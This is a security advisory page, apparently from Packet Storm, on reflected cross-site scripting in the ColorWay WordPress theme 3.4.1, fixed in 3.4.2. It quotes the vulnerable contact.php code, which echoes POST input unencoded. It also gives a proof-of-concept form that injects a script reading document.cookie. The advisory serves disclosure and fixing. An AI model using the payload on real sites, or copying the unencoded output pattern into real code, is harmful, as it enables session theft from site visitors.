what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress ColorWay 3.4.1 Cross Site Scripting

WordPress ColorWay 3.4.1 Cross Site Scripting
Posted Jul 27, 2016
Authored by Yorick Koster, Securify B.V.

WordPress ColorWay theme version 3.4.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 3bcf6e430117f011bfa6bd3a2b25554032fd79f8c9f5f3d375c6a42284fe8437

WordPress ColorWay 3.4.1 Cross Site Scripting

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in ColorWay WordPress Theme
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Multiple Cross-Site Scripting vulnerabilities were found in the ColorWay
WordPress Theme. These issues allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0024

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
These issues were successfully tested on ColorWay WordPress Theme
version 3.4.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in ColorWay WordPress Theme version 3.4.2.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_colorway_wordpress_theme.html

These issues exists due to the lack of output encoding of user input. An example can be seen in the file contact.php. Several POST parameters are using in the output without applying proper encoding.

<form action="<?php the_permalink(); ?>" id="contactForm" method="post">
<ul class="contactform">
<li>
<label for="contactName"><?php _e('Name:', 'colorway'); ?></label>
<input type="text" name="contactName" id="contactName" value="<?php if (isset($_POST['contactName'])) echo $_POST['contactName']; ?>" class="required requiredField" />
<?php if ($nameError != '') { ?>
<span class="error"> <?php echo $nameError; ?> </span>
<?php } ?>
</li>
<li>
<label for="email"><?php _e('Email', 'colorway'); ?></label>
<input type="text" name="email" id="email" value="<?php if (isset($_POST['email'])) echo $_POST['email']; ?>" class="required requiredField email" />
<?php if ($emailError != '') { ?>
<span class="error"> <?php echo $emailError; ?> </span>
<?php } ?>
</li>
<li>
<label for="commentsText"><?php _e('Message:', 'colorway'); ?></label>
<textarea name="comments" id="commentsText" rows="20" cols="30" class="required requiredField"><?php
if (isset($_POST['comments'])) {
if (function_exists('stripslashes')) {
echo stripslashes($_POST['comments']);
} else {
echo $_POST['comments'];
}
}
?>
</textarea>
<?php if ($commentError != '') { ?>
<span class="error"> <?php echo $commentError; ?> </span>
<?php } ?>
</li>
<li>
<input type="submit" value="<?php _e('Send Email', 'colorway'); ?>"/>
</li>
</ul>
<input type="hidden" name="submitted" id="submitted" value="true" />
</form>

Proof of concept

<html>
<body>
<form action="http://<target>/contact/" method="POST">
<input type="hidden" name="contactName" value=""><script>alert(document.cookie);</script>" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="comments" value=" " />
<input type="hidden" name="submitted" value="true" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    16 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close